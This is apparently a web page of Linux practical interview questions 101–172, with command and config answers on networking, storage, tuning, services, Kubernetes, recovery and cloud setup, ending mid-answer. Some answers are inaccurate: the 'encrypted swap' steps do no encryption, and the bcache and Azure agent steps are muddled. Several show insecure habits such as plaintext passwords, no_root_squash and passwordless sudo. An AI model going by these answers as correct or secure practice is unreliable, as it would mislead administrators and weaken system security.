Skip to content

Linux_Practical_Interview_101 250

Linux Practical Interview Questions (101-250)

Section titled “Linux Practical Interview Questions (101-250)”

Answer:

Terminal window
# Find and delete
find /tmp -type f -name "*.tmp" -exec rm {} \;
# Equivalent using xargs
find /tmp -type f -name "*.tmp" | xargs rm
# Parallel processing
ls *.jpg | xargs -n 1 -P 4 convert -resize 800x600
# With custom delimiter
echo "a:b:c" | xargs -d ':' -n1
# Prompt before execution
ls | xargs -p rm

Answer:

Terminal window
# Create named pipe
mkfifo /tmp/myfifo
# In one terminal (read)
cat < /tmp/myfifo
# In another terminal (write)
echo "Hello" > /tmp/myfifo
# Process substitution
diff <(sort file1) <(sort file2)
# While reading
while read line; do echo "$line"; done < /tmp/myfifo

Q103: How do you use process substitution?

Section titled “Q103: How do you use process substitution?”

Answer:

Terminal window
# Compare two command outputs
diff <(command1) <(command2)
# Read from multiple files
while read line; do echo "$line"; done < <(cat file1 file2)
# Feed output to command expecting file
grep pattern <(echo "line with pattern")
# Multiple inputs
comm <(sort file1) <(sort file2)

Answer:

Terminal window
# Basic GET
curl https://api.example.com
# POST with JSON
curl -X POST -H "Content-Type: application/json" \
-d '{"key":"value"}' https://api.example.com
# Download with progress
curl -O -L https://example.com/file.zip
# With authentication
curl -u user:password https://api.example.com
# Follow redirects
curl -L https://example.com
# With cookie
curl -b cookies.txt -c cookies.txt https://example.com

Answer:

Terminal window
# Download file
wget https://example.com/file.zip
# Download recursively
wget -r https://example.com/
# Continue download
wget -c https://example.com/largefile.zip
# Mirror site
wget -m -k -p https://example.com
# Download with credentials
wget --user=user --password=pass https://example.com
# Limit bandwidth
wget --limit-rate=100k https://example.com/file.zip

Q106: How do you configure network bonding in Linux?

Section titled “Q106: How do you configure network bonding in Linux?”

Answer:

Terminal window
# Create bond interface
cat > /etc/sysconfig/network-scripts/ifcfg-bond0 <<EOF
DEVICE=bond0
ONBOOT=yes
BOOTPROTO=none
IPADDR=192.168.1.10
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
BONDING_OPTS="mode=1 miimon=100 fail_over_mac=2"
EOF
# Configure slave interfaces
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
MASTER=bond0
SLAVE=yes
ONBOOT=yes
EOF
# Reload network
systemctl restart network

Answer:

Terminal window
# Install VLAN package
apt install vlan
# Create VLAN interface
vconfig add eth0 100
# Configure
cat > /etc/sysconfig/network-scripts/ifcfg-eth0.100 <<EOF
DEVICE=eth0.100
VLAN=yes
ONBOOT=yes
IPADDR=192.168.100.10
NETMASK=255.255.255.0
EOF
# Or use ip command
ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 192.168.100.10/24 dev eth0.100

Q108: How do you configure network bridging?

Section titled “Q108: How do you configure network bridging?”

Answer:

Terminal window
# Create bridge
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
# Configure IP
ip addr add 192.168.1.10/24 dev br0
ip link set br0 up
# Make persistent (CentOS/RHEL)
cat > /etc/sysconfig/network-scripts/ifcfg-br0 <<EOF
DEVICE=br0
TYPE=Bridge
IPADDR=192.168.1.10
NETMASK=255.255.255.0
ONBOOT=yes
EOF

Answer:

Terminal window
# Add temporary route
ip route add 192.168.100.0/24 via 192.168.1.1 dev eth0
ip route add default via 192.168.1.1
# Persistent routes (CentOS)
cat > /etc/sysconfig/network-scripts/route-eth0 <<EOF
192.168.100.0/24 via 192.168.1.1
EOF
# Persistent routes (Debian)
cat >> /etc/network/interfaces <<EOF
up ip route add 192.168.100.0/24 via 192.168.1.1
EOF
# View routes
ip route show
route -n

Q110: How do you configure 802.1Q VLAN tagging?

Section titled “Q110: How do you configure 802.1Q VLAN tagging?”

Answer:

Terminal window
# Load kernel module
modprobe 8021q
# Make persistent
echo "8021q" >> /etc/modules
# Create VLAN
vconfig add eth0 100
# Configure IP
ip addr add 192.168.100.10/24 dev eth0.100
ip link set eth0.100 up
# Verify
ip -d link show eth0.100

Answer:

Terminal window
# Install initiator
apt install open-iscsi
# Discover targets
iscsiadm -m discovery -t st -p 192.168.1.100
# Login to target
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -l
# Make persistent
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -p 192.168.1.100 --op update -n node.startup -v automatic
# Check status
iscsiadm -m session -P 3
# Remove
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -u

Answer:

Terminal window
# Server side
# Install
apt install nfs-kernel-server
# Create export
mkdir -p /exports/shared
echo "/exports/shared 192.168.1.0/24(rw,sync,no_root_squash,no_all_squash)" >> /etc/exports
# Export
exportfs -a
systemctl restart nfs-kernel-server
# Client side
apt install nfs-common
# Mount
mount -t nfs 192.168.1.10:/exports/shared /mnt/nfs
# Persistent mount
echo "192.168.1.10:/exports/shared /mnt/nfs nfs defaults 0 0" >> /etc/fstab

Answer:

Terminal window
# Install
apt install cifs-utils samba
# Server config /etc/samba/smb.conf
[shared]
path = /srv/samba/shared
browseable = yes
writable = yes
valid users = @smbgroup
# Create user
smbpasswd -a username
# Client mount
mount -t cifs //server/share /mnt -o user=username,password=pass
# Persistent mount
# /etc/fstab
//server/share /mnt cifs credentials=/root/smb.creds 0 0

Answer:

Terminal window
# Create squashfs
mksquashfs source_dir output.squashfs -comp xz
# Mount squashfs
mount -t squashfs -o loop image.squashfs /mnt/squash
# List contents
unsquashfs -l image.squashfs
# Extract specific file
unsquashfs -e image.squashfs file.txt
# With compression options
mksquashfs source output.squashfs -comp xz -Xbcj x86

Q115: How do you use Stratis for storage management?

Section titled “Q115: How do you use Stratis for storage management?”

Answer:

Terminal window
# Install
apt install stratisd stratis-cli
# Start service
systemctl start stratisd
# Create pool
stratis pool create mypool /dev/sdb /dev/sdc
# Create filesystem
stratis fs create mypool myfs
# Mount
mount /stratis/mypool/myfs /mnt
# List
stratis pool list
stratis fs list

Answer:

/etc/sysctl.conf
# Network hardening
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Apply
sysctl -p

Answer:

Terminal window
# Install
apt install quota
# Enable quota in fstab
# Add usrquota,grpquota to /etc/fstab
# /dev/sda1 / ext4 defaults,usrquota,grpquota 0 0
# Remount
mount -o remount /
# Initialize quota
quotacheck -augm
# Set user quota
edquota -u username
# Enable quota
quotaon -uv /
# Check quota
quota -u username
repquota -a

Q118: How do you set up AIDE (Advanced Intrusion Detection Environment)?

Section titled “Q118: How do you set up AIDE (Advanced Intrusion Detection Environment)?”

Answer:

Terminal window
# Install
apt install aide
# Initialize database
aideinit
# Configure
cat /etc/aide/aide.conf
!/var/log/.*
!/var/cache/.*
# Update database
aide --update
# Check integrity
aide --check
# Daily cron
0 5 * * * /usr/bin/aide --check

Answer:

Terminal window
# Install
apt install apparmor apparmor-profiles
# Check status
aa-status
# Enable modes
aa-complain /usr/bin/nginx
aa-enforce /usr/bin/nginx
# Create profile
cat /etc/apparmor.d/usr.bin.myapp
#include <tunables/global>
/usr/bin/myapp {
# Allow read
/etc/myapp/** r,
# Allow write
/var/log/myapp/** rw,
}
# Reload
apparmor_parser -r /etc/apparmor.d/usr.bin.myapp

Q120: How do you implement file integrity monitoring?

Section titled “Q120: How do you implement file integrity monitoring?”

Answer:

Terminal window
# Using AIDE (see above)
# Using tripwire
apt install tripwire
# Initialize
twadmin --create-polfile /etc/tripwire/tw.pol
tripwire --init
# Check
tripwire --check
# Update
tripwire --update --accept-all

Q121: How do you tune network performance?

Section titled “Q121: How do you tune network performance?”

Answer:

/etc/sysctl.conf
# Increase TCP buffer sizes
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216
# Increase connection tracking
net.netfilter.nf_conntrack_max = 1048576
# Enable TCP BBR
net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr
# Apply
sysctl -p

Answer:

Terminal window
# Scheduler
# Check current
cat /sys/block/sda/queue/scheduler
# Set deadline
echo deadline > /sys/block/sda/queue/scheduler
# I/O scheduler options
echo 1024 > /sys/block/sda/queue/nr_requests
echo 256 > /sys/block/sda/queue/read_ahead_kb
# Make persistent (CentOS)
# /etc/udev/rules.d/60-scheduler.rules
ACTION=="add|change", KERNEL=="sda", ATTR{queue/scheduler}="deadline"

Answer:

/etc/sysctl.conf
# Swappiness
vm.swappiness = 10
vm.vfs_cache_pressure = 50
vm.dirty_ratio = 60
vm.dirty_background_ratio = 5
# Huge pages
vm.nr_hugepages = 128
# Apply
sysctl -p
# Check memory
cat /proc/meminfo

Answer:

Terminal window
# CPU governor
# Check available governors
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
# Set performance
echo performance > /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
# Make persistent
# /etc/default/cpufrequtils
GOVERNOR="performance"
# Disable transparent huge pages
echo never > /sys/kernel/mm/transparent_hugepage/enabled

Answer:

/etc/sysctl.conf
# Connection tracking
net.netfilter.nf_conntrack_max = 1048576
net.netfilter.nf_conntrack_tcp_timeout_established = 7200
# TCP timeouts
net.ipv4.tcp_fin_timeout = 15
net.ipv4.tcp_keepalive_time = 300
net.ipv4.tcp_keepalive_probes = 5
net.ipv4.tcp_keepalive_intvl = 15
# TCP buffer
net.core.rmem_max = 134217728
net.core.wmem_max = 134217728
# Apply
sysctl -p

Q126: How do you configure Postfix mail server?

Section titled “Q126: How do you configure Postfix mail server?”

Answer:

/etc/postfix/main.cf
# Install
apt install postfix mailutils
myhostname = mail.example.com
mydomain = example.com
myorigin = $mydomain
mydestination = $myhostname, localhost, localhost.localdomain
mynetworks = 192.168.1.0/24 127.0.0.0/8
relayhost = [smtp.provider.com]:587
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_tls_security_level = encrypt
# Create password map
echo "[smtp.provider.com]:587 username:password" > /etc/postfix/sasl_passwd
postmap /etc/postfix/sasl_passwd
systemctl restart postfix

Answer:

/etc/dovecot/dovecot.conf
# Install
apt install dovecot-core dovecot-imapd dovecot-pop3d
protocols = imap pop3
listen = *
# /etc/dovecot/10-auth.conf
disable_plaintext_auth = yes
auth_mechanisms = plain login
# /etc/dovecot/10-mail.conf
mail_location = maildir:~/Maildir
# Configure userdb
# /etc/dovecot/10-user.conf
userdb {
driver = passwd
}
systemctl restart dovecot

Answer:

/etc/squid/squid.conf
# Install
apt install squid
http_port 3128
acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all
# Cache configuration
cache_dir ufs /var/spool/squid 10000 16 256
maximum_object_size 4096 MB
# Authentication
auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
# Reload
systemctl reload squid

Answer:

/etc/haproxy/haproxy.cfg
# Install
apt install haproxy
global
log /dev/log local0
maxconn 4000
user haproxy
group haproxy
defaults
log global
mode http
option httplog
option dontlognull
option http-server-close
option forwardfor except 127.0.0.0/8
option redispatch
retries 3
timeout connect 5000
timeout client 50000
timeout server 50000
frontend http-in
bind *:80
default_backend servers
backend servers
balance roundrobin
server web1 192.168.1.10:80 check
server web2 192.168.1.11:80 check

Answer:

/etc/vsftpd.conf
# Install
apt install vsftpd
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/var/run/vsftpd/empty
# Enable SSL
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=YES
# Create user
useradd -m -s /usr/sbin/nologin ftpuser
passwd ftpuser
systemctl restart vsftpd

Answer:

Terminal window
# Install
apt install sysstat
# Enable data collection
systemctl enable sysstat
systemctl start sysstat
# CPU stats
sar -u 1 5
# All CPU
sar -P ALL 1 3
# Memory
sar -r 1 3
# Swap
sar -S 1 3
# I/O
sar -b 1 3
# Network
sar -n DEV 1 3
# Generate report
sar -A > /tmp/sar_report.txt

Answer:

Terminal window
# Install
apt install sysstat
# Basic
iostat
# Interval
iostat 2 5
# Per device
iostat -x
# Detailed
iostat -x -t
# Specific device
iostat -d sda
# Report CPU and device utilization
iostat -c -d sda

Answer:

Terminal window
# Install
apt install sysstat
# All CPUs
mpstat
# Interval
mpstat 2 5
# Per processor
mpstat -P ALL 2 3
# Specific CPU
mpstat -P 0 1 5
# Fields
mpstat -A

Answer:

Terminal window
# Install
apt install sysstat
# CPU per process
pidstat -p PID 1
# Memory
pidstat -r PID 1
# I/O
pidstat -d PID 1
# All processes
pidstat 1
# User-specific
pidstat -u -p ALL 1
# Interval with lines
pidstat -hl 1

Answer:

Terminal window
# Install
apt install atop
# Interactive
atop
# Interval
atop 1
# Specific process
atop -p PID
# Network
atop -n
# Disk
atop -d
# Write to file
atop -w /tmp/atop.log 30 120
# Read
atop -r /tmp/atop.log
# Daily summaries
atopsar -c
atopsar -m

Q136: How do you configure Kubernetes node?

Section titled “Q136: How do you configure Kubernetes node?”

Answer:

Terminal window
# Install kubeadm
apt-get update && apt-get install -y apt-transport-https curl
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
echo "deb https://apt.kubernetes.io/ kubernetes-xenial main" > /etc/apt/sources.list.d/kubernetes.list
apt-get update && apt-get install -y kubelet kubeadm kubectl
# Initialize master
kubeadm init --pod-network-cidr=10.244.0.0/16
# Join node
kubeadm join 192.168.1.10:6443 --token token --discovery-token-ca-cert-hash sha256:hash
# Install pod network
kubectl apply -f https://raw.githubusercontent.com/flannel/flannel/master/Documentation/kube-flannel.yml

Q137: How do you create Kubernetes deployments?

Section titled “Q137: How do you create Kubernetes deployments?”

Answer:

deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp
spec:
replicas: 3
selector:
matchLabels:
app: myapp
template:
metadata:
labels:
app: myapp
spec:
containers:
- name: myapp
image: nginx:latest
ports:
- containerPort: 80
resources:
limits:
memory: "128Mi"
cpu: "500m"
requests:
memory: "64Mi"
cpu: "250m"
# Apply
kubectl apply -f deployment.yaml

Q138: How do you configure Kubernetes services?

Section titled “Q138: How do you configure Kubernetes services?”

Answer:

service.yaml
apiVersion: v1
kind: Service
metadata:
name: myapp-svc
spec:
type: ClusterIP
selector:
app: myapp
ports:
- port: 80
targetPort: 80
# NodePort
spec:
type: NodePort
selector:
app: myapp
ports:
- port: 80
targetPort: 80
nodePort: 30080
# LoadBalancer
spec:
type: LoadBalancer
selector:
app: myapp
ports:
- port: 80
targetPort: 80
# Apply
kubectl apply -f service.yaml

Q139: How do you manage Kubernetes configmaps and secrets?

Section titled “Q139: How do you manage Kubernetes configmaps and secrets?”

Answer:

Terminal window
# Create configmap
kubectl create configmap app-config \
--from-literal=ENV=production \
--from-file=app.properties=app.properties
# Create secret
kubectl create secret generic db-credentials \
--from-literal=username=admin \
--from-literal=password=secret
# From file
kubectl create secret generic tls-cert \
--from-file=tls.crt=tls.crt \
--from-file=tls.key=tls.key
# Use in pod
env:
- name: ENV
valueFrom:
configMapKeyRef:
name: app-config
key: ENV
- name: PASSWORD
valueFrom:
secretKeyRef:
name: db-credentials
key: password

Q140: How do you manage Kubernetes ingress?

Section titled “Q140: How do you manage Kubernetes ingress?”

Answer:

ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: myapp-ingress
annotations:
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myapp.example.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: myapp-svc
port:
number: 80
# Apply
kubectl apply -f ingress.yaml

Answer:

Terminal window
# Check IPv6 status
ip -6 addr show
ping6 ipv6.google.com
# Static IPv6 address
ip -6 addr add 2001:db8::10/64 dev eth0
# Route IPv6
ip -6 route add 2001:db8:1::/48 via 2001:db8::1
# Disable IPv6
# sysctl.conf
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
# Apply
sysctl -p

Q142: How do you configure bonding with LACP?

Section titled “Q142: How do you configure bonding with LACP?”

Answer:

/etc/sysconfig/network-scripts/ifcfg-bond0
DEVICE=bond0
ONBOOT=yes
BOOTPROTO=none
BONDING_OPTS="mode=4 miimon=100 lacp_rate=1"
# /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
MASTER=bond0
SLAVE=yes
ETHTOOL_OPTS="speed 1000 duplex full"
# Verify
cat /proc/net/bonding/bond0

Q143: How do you configure network monitoring?

Section titled “Q143: How do you configure network monitoring?”

Answer:

Terminal window
# Using nethogs
apt install nethogs
nethogs eth0
# Using iftop
apt install iftop
iftop
# Using bmon
apt install bmon
bmon
# Using iptraf-ng
apt install iptraf-ng
iptraf-ng
# Using vnstat
apt install vnstat
vnstat -l -i eth0

Q144: How do you configure packet filtering?

Section titled “Q144: How do you configure packet filtering?”

Answer:

Terminal window
# Basic iptables rules
# Allow established connections
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Allow SSH
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# Allow HTTP/HTTPS
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
# Allow localhost
iptables -A INPUT -i lo -j ACCEPT
# Drop everything else
iptables -A INPUT -j DROP
# Save rules
iptables-save > /etc/iptables/rules.v4

Answer:

Terminal window
# Install
apt install nftables
# Create ruleset
cat > /etc/nftables.conf <<EOF
#!/usr/sbin/nft -f
flush ruleset
table inet filter {
chain input {
type filter hook input priority 0; policy drop;
ct state established,related accept
iif lo accept
tcp dport ssh accept
tcp dport http accept
tcp dport https accept
}
chain forward {
type filter hook forward priority 0; policy drop;
}
chain output {
type filter hook output priority 0; policy accept;
}
}
EOF
# Reload
nft -f /etc/nftables.conf
systemctl enable nftables

Answer:

Terminal window
# Create encrypted swap
dd if=/dev/zero of=/swapfile bs=1M count=2048
chmod 600 /swapfile
mkswap /swapfile
# Add to /etc/fstab
/swapfile none swap sw 0 0
# Enable
swapon /swapfile
# Verify
swapon -s
free -h

Q147: How do you configure device mapper multipath?

Section titled “Q147: How do you configure device mapper multipath?”

Answer:

Terminal window
# Install
apt install multipath-tools
# Configure /etc/multipath.conf
defaults {
user_friendly_names yes
find_multipaths yes
}
multipaths {
multipath {
wwid "3600605b00e0c960018e0c95c00000000"
alias mpath0
}
}
# Start service
systemctl start multipathd
systemctl enable multipathd
# Commands
multipath -ll
multipath -f mpath0

Answer:

Terminal window
# Create btrfs
mkfs.btrfs -L mydata /dev/sdb
# Mount
mount /dev/sdb /mnt/btrfs
# Subvolumes
btrfs subvolume create /mnt/btrfs/data
btrfs subvolume list /mnt/btrfs
# Snapshots
btrfs subvolume snapshot /mnt/btrfs/data /mnt/btrfs/snap
# Balance
btrfs balance start /mnt/btrfs
# Compression
mount -o compress=zstd /dev/sdb /mnt/btrfs
# RAID
mkfs.btrfs -d raid1 -m raid1 /dev/sdb /dev/sdc

Answer:

Terminal window
# Install
apt install bcache-tools
# Create backing device
make-bcache -C /dev/sdb
# or
make-bcache -B /dev/sdc # backing
# Create cache device
make-bcache -C /dev/sda
# Register
echo /dev/sdb > /sys/block/bcache0/bcache/register
echo /dev/sda > /sys/block/bcache0/cache/register
# Attach
echo /dev/sda > /sys/block/bcache0/bcache0/bcache/attach
# Make filesystem
mkfs.ext4 /dev/bcache0
mount /dev/bcache0 /mnt

Q150: How do you use mdadm for software RAID?

Section titled “Q150: How do you use mdadm for software RAID?”

Answer:

Terminal window
# Create RAID 5
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb /dev/sdc /dev/sdd
# Create RAID 10
mdadm --create /dev/md0 --level=10 --raid-devices=4 /dev/sdb /dev/sdc /dev/sdd /dev/sde
# Check status
mdadm --detail /dev/md0
cat /proc/mdstat
# Stop array
mdadm --stop /dev/md0
# Remove failed disk
mdadm /dev/md0 --remove /dev/sdb
# Add new disk
mdadm --add /dev/md0 /dev/sde
# Monitor
mdadm --monitor --daemonise --mail=admin@example.com /dev/md0

Q151: How do you recover from forgotten root password?

Section titled “Q151: How do you recover from forgotten root password?”

Answer:

# Method 1: Single user mode
1. Reboot system
2. Press 'e' at GRUB menu
3. Add 'single' or 'init=/bin/bash' to linux line
4. Press Ctrl+X to boot
5. mount -o remount,rw /
6. passwd root
7. exec /sbin/init
# Method 2: Using rescue disk
1. Boot from rescue media
2. Mount filesystem
3. chroot /mnt/sysimage
4. passwd root
5. exit
6. reboot

Q152: How do you recover from boot failure?

Section titled “Q152: How do you recover from boot failure?”

Answer:

Terminal window
# Check boot logs
journalctl -b -1
dmesg | grep -i error
# Rebuild initramfs
update-initramfs -u
# Reinstall GRUB
grub-install /dev/sda
grub-mkconfig -o /boot/grub/grub.cfg
# Check fstab
blkid
mount -a
# Emergency boot
# Add to GRUB: init=/bin/bash

Q153: How do you recover from disk failure?

Section titled “Q153: How do you recover from disk failure?”

Answer:

Terminal window
# Check disk health
smartctl -a /dev/sda
# Check filesystem
fsck -n /dev/sda1
# Remount read-only
mount -o ro,remount /dev/sda1
# Try to fix
fsck -y /dev/sda1
# Replace disk
# 1. Partition new disk (sfdisk -d /dev/sda | sfdisk /dev/sdb)
# 2. Copy boot sector (dd if=/dev/sda of=/dev/sdb bs=512 count=1)
# 3. Rebuild RAID (mdadm --add /dev/md0 /dev/sdb)
# 4. Rebuild GRUB

Q154: How do you recover from network issues?

Section titled “Q154: How do you recover from network issues?”

Answer:

Terminal window
# Reset network
ip link set eth0 down
ip link set eth0 up
dhclient -r eth0
dhclient eth0
# Restart network service
systemctl restart NetworkManager
systemctl restart networking
# Check logs
journalctl -xe
# Reset TCP/IP stack
sysctl -w net.ipv4.tcp_rmem="4096 87380 6291456"
sysctl -w net.ipv4.tcp_wmem="4096 65536 6291456"
sysctl -w net.core.rmem_max="12582912"
sysctl -w net.core.wmem_max="12582912"

Q155: How do you recover from memory issues?

Section titled “Q155: How do you recover from memory issues?”

Answer:

Terminal window
# Check OOM killer
dmesg | grep -i "out of memory"
journalctl -k | grep -i "killed process"
# Check process memory
ps aux --sort=-%mem | head
pmap -X PID
# Clear cache
sync
echo 3 > /proc/sys/vm/drop_caches
# Kill process manually
kill -15 PID
kill -9 PID
# Adjust OOM settings
echo -15 > /proc/PID/oom_score_adj

Answer:

Terminal window
# Install dependencies
apt install build-essential libncurses-dev bison flex libssl-dev libelf-dev
# Download kernel
wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.15.tar.xz
tar -xf linux-5.15.tar.xz
cd linux-5.15
# Configure
make menuconfig
# Build
make -j$(nproc)
make modules_install
make install
# Update GRUB
update-grub
reboot

Answer:

hello.c
#include <linux/module.h>
#include <linux/kernel.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Author");
MODULE_DESCRIPTION("Hello World Module");
int init_module(void) {
printk(KERN_INFO "Hello World!\n");
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "Goodbye World!\n");
}
# Makefile
obj-m += hello.o
KDIR := /lib/modules/$(shell uname -r)/build
all:
make -C $(KDIR) M=$(PWD) modules
clean:
make -C $(KDIR) M=$(PWD) clean
# Build
make
# Load
insmod hello.ko
# Unload
rmmod hello
# Check
lsmod | grep hello
dmesg | tail

Q158: How do you tune kernel parameters at runtime?

Section titled “Q158: How do you tune kernel parameters at runtime?”

Answer:

Terminal window
# View all parameters
sysctl -a
# View specific
sysctl net.ipv4.tcp_rmem
# Set temporarily
sysctl -w net.ipv4.tcp_rmem="4096 87380 6291456"
# Set persistently
echo "net.ipv4.tcp_rmem = 4096 87380 6291456" >> /etc/sysctl.conf
sysctl -p
# View parameter documentation
ls /proc/sys/
# or
man sysctl.conf

Q159: How do you add system calls to kernel?

Section titled “Q159: How do you add system calls to kernel?”

Answer:

// mysyscall.c (in kernel source)
asmlinkage long sys_mysyscall(int arg) {
printk(KERN_INFO "My syscall called with %d\n", arg);
return 0;
}
// Add to syscall table (arch/x86/entry/syscalls/syscall_64.tbl)
555 64 mysyscall sys_mysyscall
// In kernel headers
#define __NR_mysyscall 555
// User space
#include <sys/syscall.h>
syscall(555, arg);

Answer:

Terminal window
# Kernel debugging
# Enable debug
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_KERNEL=y
CONFIG_KALLSYMS=y
# Use kgdb
CONFIG_KGDB=y
# Add to boot: kgdboc=ttyS0,115200
# Use crash dump
# Install crash
apt install crash
# Capture
kexec -p /boot/vmlinuz --initrd=/boot/initrd.img --append="-- crash"
# Kernel logs
dmesg
journalctl -k
/var/log/dmesg

Answer:

Terminal window
# Using jq
apt install jq
# Parse JSON
echo '{"name":"John","age":30}' | jq '.name'
echo '{"users":["Alice","Bob"]}' | jq '.users[0]'
# Conditional
echo '{"status":"ok"}' | jq 'if .status == "ok" then "success" else "failed" end'
# Modify
echo '{"name":"John"}' | jq '.age = 30'
# From file
jq '.users[]' data.json
# With variables
NAME=$(echo "$JSON" | jq -r '.name')

Answer:

Terminal window
# Basic parsing
while IFS=',' read -r col1 col2 col3; do
echo "$col1 $col2 $col3"
done < file.csv
# Skip header
tail -n +2 file.csv | while IFS=',' read -r col1 col2 col3; do
echo "$col1 $col2 $col3"
done
# Using awk
awk -F',' '{print $1,$2}' file.csv
# With headers
awk -F',' 'NR==1 {for(i=1;i<=NF;i++) h[$i]=i} NR>1 {print $h["name"],$h["age"]}' file.csv

Q163: How do you use expect for automation?

Section titled “Q163: How do you use expect for automation?”

Answer:

Terminal window
# Install
apt install expect
# expect script
#!/usr/bin/expect -f
set timeout 30
spawn ssh user@host
expect "password:"
send "mypassword\r"
expect "~]$"
send "ls -la\r"
expect eof
# Run
chmod +x script.exp
./script.exp

Q164: How do you use Python for system administration?

Section titled “Q164: How do you use Python for system administration?”

Answer:

#!/usr/bin/env python3
import subprocess
import os
import sys
# Run command
result = subprocess.run(['ls', '-la'], capture_output=True, text=True)
print(result.stdout)
# Check service status
def check_service(name):
result = subprocess.run(['systemctl', 'is-active', name],
capture_output=True, text=True)
return result.stdout.strip() == 'active'
# File operations
with open('/etc/hosts', 'r') as f:
for line in f:
print(line.strip())
# Network check
import socket
socket.gethostbyname('example.com')

Answer:

Terminal window
# GNU Parallel
apt install parallel
# Parallel execution
cat servers.txt | parallel -j 10 "ssh {} 'uptime'"
# With SSH
parallel-ssh -h hosts.txt -i "uptime"
# Process files in parallel
ls *.jpg | parallel -j 4 convert -resize 800x600 {} {}_small.jpg
# With xargs
find . -name "*.log" | xargs -P 4 -I {} gzip {}
# GNU parallel with variables
seq 1 100 | parallel -j 10 'echo "Number {}"'

Q166: How do you configure AWS CLI on Linux?

Section titled “Q166: How do you configure AWS CLI on Linux?”

Answer:

Terminal window
# Install AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
./aws/install
# Configure
aws configure
AWS Access Key ID: ***
AWS Secret Access Key: ***
Default region name: us-east-1
Default output format: json
# Profile
aws configure --profile myprofile
aws s3 ls --profile myprofile

Q167: How do you use AWS SSM Session Manager?

Section titled “Q167: How do you use AWS SSM Session Manager?”

Answer:

Terminal window
# Install SSM agent
apt install amazon-ssm-agent
# Start service
systemctl start amazon-ssm-agent
systemctl enable amazon-ssm-agent
# Configure
# Add IAM role with AmazonSSMManagedInstanceCore
# Connect
aws ssm start-session --target i-1234567890abcdef0
# Transfer files
aws ssm start-session --target i-1234567890abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters '{"portNumber":["3389"],"localPortNumber":["33890"]}'

Answer:

cloud-config.yaml
#cloud-config
package_update: true
packages:
- nginx
- curl
write_files:
- path: /var/www/html/index.html
content: |
<html><h1>Hello World</h1></html>
runcmd:
- systemctl enable nginx
- systemctl start nginx
users:
- name: admin
ssh-authorized-keys:
- ssh-rsa AAAAB... user@host
sudo: ALL=(ALL) NOPASSWD:ALL

Q169: How do you use Terraform with Linux?

Section titled “Q169: How do you use Terraform with Linux?”

Answer:

main.tf
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 4.0"
}
}
}
provider "aws" {
region = "us-east-1"
}
resource "aws_instance" "web" {
ami = "ami-0c55b159cbfafe1f0"
instance_type = "t3.micro"
tags = {
Name = "web-server"
}
user_data = <<-EOF
#!/bin/bash
yum update -y
yum install -y httpd
systemctl start httpd
systemctl enable httpd
EOF
}
# Commands
terraform init
terraform plan
terraform apply
terraform destroy

Q170: How do you configure Azure cloud agent on Linux?

Section titled “Q170: How do you configure Azure cloud agent on Linux?”

Answer:

Terminal window
# Install Azure agent
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb
apt update
apt install -y waagent
# Configure
# Edit /etc/waagent.conf
# ResourceDisk.Format=y
# ResourceDisk.Filesystem=ext4
# Enable SSH
# Provision
waagent -force -deprovision

Answer:

/etc/keepalived/keepalived.conf
# Install
apt install keepalived
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 51
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass mypassword
}
virtual_ipaddress {
192.168.1.100 dev eth0 label eth0:vip
}
}
# BACKUP config
# priority 90
# Enable service
systemctl enable keepalived
systemctl start keepalived

Q172: How do you configure Pacemaker/Corosync?

Section titled “Q172: How do you configure Pacemaker/Corosync?”

Answer:

Terminal window
# Install
apt install pacemaker corosync pcs
